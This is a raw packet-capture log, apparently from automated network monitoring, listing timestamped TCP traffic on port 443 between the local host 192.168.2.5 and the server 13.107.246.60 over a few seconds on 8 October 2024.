Oct 8, 2024 20:47:55.499027967 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.499034882 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.499176025 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.499190092 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.500979900 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.501065016 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.501162052 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.501280069 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.501311064 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.506278992 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.506548882 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.506612062 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.506659031 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.506670952 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.506683111 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.506688118 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.508591890 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.508677959 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.508773088 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.508884907 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.508922100 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.555315971 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.555565119 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.555707932 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.555933952 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.555954933 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.555965900 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.555972099 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.557864904 CEST	49974	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.557945967 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.558028936 CEST	49974	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.558144093 CEST	49974	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.558166981 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.094738960 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.095284939 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.095345974 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.095746040 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.095761061 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.524534941 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.524615049 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.524688005 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.524740934 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.524770975 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.524830103 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.524972916 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.525022984 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.525053024 CEST	49973	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.525067091 CEST	443	49973	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.527303934 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.527724028 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.527784109 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.527838945 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.527895927 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.527970076 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.528084993 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.528115988 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.528220892 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.528232098 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.528517962 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.528793097 CEST	49974	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.528810024 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.529149055 CEST	49974	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.529159069 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.532075882 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.532366037 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.532393932 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.532696962 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.532704115 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.878365040 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.878483057 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.878637075 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.879264116 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.879293919 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.879318953 CEST	49972	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.879332066 CEST	443	49972	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.881819963 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.881907940 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.882056952 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.882129908 CEST	49974	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.884434938 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.884500027 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.884510040 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.884545088 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.884593964 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.887269020 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.887291908 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.887300968 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.887306929 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.888257027 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.888294935 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.888370037 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.888988972 CEST	49974	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.889022112 CEST	443	49974	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.890746117 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.890759945 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.892690897 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.892780066 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.892878056 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.893348932 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.893384933 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.893961906 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.893984079 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.894064903 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.894205093 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.894229889 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.984389067 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.984900951 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.984920025 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:56.985506058 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:56.985512972 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.398439884 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.398493052 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.398714066 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.398757935 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.398778915 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.398824930 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.398833036 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.401822090 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.401880980 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.401962996 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.402108908 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.402144909 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.426608086 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.430541992 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.430603981 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.431150913 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.431163073 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.530819893 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.530878067 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.530960083 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.530986071 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.531014919 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.531069994 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.531176090 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.531212091 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.531238079 CEST	49975	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.531251907 CEST	443	49975	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.534188986 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.534235001 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.534316063 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.534495115 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.534514904 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.540672064 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.541033983 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.541090965 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.541516066 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.541599989 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.541614056 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.541815042 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.541830063 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.542283058 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.542293072 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.550013065 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.550272942 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.550317049 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.550739050 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.550751925 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.642888069 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.643028975 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.643281937 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.643281937 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.645792007 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.645800114 CEST	49978	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.645828009 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.645839930 CEST	443	49978	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.645948887 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.646078110 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.646094084 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.657839060 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.661390066 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.661468983 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.661518097 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.661518097 CEST	49976	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.661546946 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.661569118 CEST	443	49976	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.663813114 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.663851976 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.663918018 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.664024115 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.664038897 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.691212893 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.691530943 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.691718102 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.691718102 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.693484068 CEST	49977	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.693494081 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.693522930 CEST	443	49977	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.693557978 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:57.693634987 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.693747044 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:57.693778038 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.037813902 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.038336992 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.038387060 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.038958073 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.038969994 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.137718916 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.137751102 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.137794018 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.137825966 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.138040066 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.138084888 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.138117075 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.138117075 CEST	49979	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.138138056 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.138154984 CEST	443	49979	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.141359091 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.141402960 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.141611099 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.141796112 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.141825914 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.206743956 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.207242966 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.207288027 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.207834959 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.207849026 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.293139935 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.293481112 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.293510914 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.294019938 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.294027090 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.310031891 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.310403109 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.310411930 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.310743093 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.310749054 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.318659067 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.318938971 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.319025040 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.319093943 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.319093943 CEST	49980	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.319129944 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.319158077 CEST	443	49980	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.321634054 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.321727991 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.321813107 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.321969032 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.322005987 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.336025000 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.336329937 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.336349964 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.336853027 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.336859941 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.394845009 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.394996881 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.395191908 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.395191908 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.395191908 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.397170067 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.397254944 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.397351027 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.397645950 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.397680998 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.408349037 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.408392906 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.408443928 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.408458948 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.408508062 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.408552885 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.408592939 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.408607960 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.408620119 CEST	49982	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.408626080 CEST	443	49982	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.410769939 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.410819054 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.410892963 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.411173105 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.411201954 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.563750029 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.564023972 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.564085960 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.564125061 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.564125061 CEST	49983	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.564141989 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.564155102 CEST	443	49983	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.566750050 CEST	49988	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.566792965 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.566875935 CEST	49988	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.567051888 CEST	49988	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.567081928 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:58.701486111 CEST	49981	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:58.701499939 CEST	443	49981	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.097033024 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.097476006 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.097537041 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.097882986 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.097896099 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.198355913 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.198375940 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.198637962 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.198658943 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.198714018 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.198870897 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.198870897 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.198870897 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.201375961 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.201421022 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.201523066 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.201687098 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.201699018 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.286505938 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.286883116 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.286945105 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.287242889 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.287256956 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.288419008 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.288655996 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.288712978 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.288923025 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.288935900 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.289526939 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.289870024 CEST	49988	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.289958000 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.290040970 CEST	49988	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.290055990 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.295802116 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.296042919 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.296058893 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.296309948 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.296320915 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.514230013 CEST	49984	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.514293909 CEST	443	49984	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749783039 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749814987 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749835014 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749862909 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749886990 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749907970 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749931097 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.749978065 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.750041008 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.750118971 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750123024 CEST	49988	443	192.168.2.5	13.107.246.60
